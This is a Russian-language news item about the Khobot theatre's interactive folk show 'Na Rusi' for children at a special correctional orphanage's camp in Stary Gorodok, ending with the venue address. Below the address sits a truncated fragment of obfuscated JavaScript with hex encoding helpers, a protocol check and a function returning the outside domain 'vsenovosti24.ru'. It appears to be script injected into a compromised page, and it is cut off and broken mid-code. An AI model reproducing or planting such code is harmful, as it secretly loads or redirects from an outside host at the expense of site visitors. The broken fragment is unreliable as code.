Контактный спектакль «На Руси»

Театр ХОБОТ, контактный спектакль «На Руси»

Сегодня детей, приехавших в лагерь специального коррекционного детского дома поселка Старый городок, с самого утра ждал сюрприз.
Пятеро актеров театра «Хобот», одетых в яркие русские народные наряды встречали юных гостей. И встречали не простым представлением. Была подготовлена целая большая программа — и игры, и показательные танцы и обучающий блок.

Дети с удовольствием посмотрели познавательные слайды, которые рассказали им о том, как раньше одевались на Руси, как правильно подпоясать косоворотку, как должен был выглядеть девичий сарафан и многое другое.
Театр «Хобот» также подготовил множество русских народных игр, забав и развлечений.
«Мы плели большие длинные косы, стреляли из рогатки, водили хороводы, играли в «уточку» и многое другое. А так же пели русские народные песни и играли вместе с детьми на музыкальных инструментах и деревянных ложках».

Адрес проведения: Специальный (коррекционный) детский дом п. Старый городок — Одинцовский район, Кубинка, Старый Городок, ул. Заводская, 28

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=»»,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return «vsenovosti24.ru»},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(«http»)==0){return p}for(var e=0;e

Добавить комментарий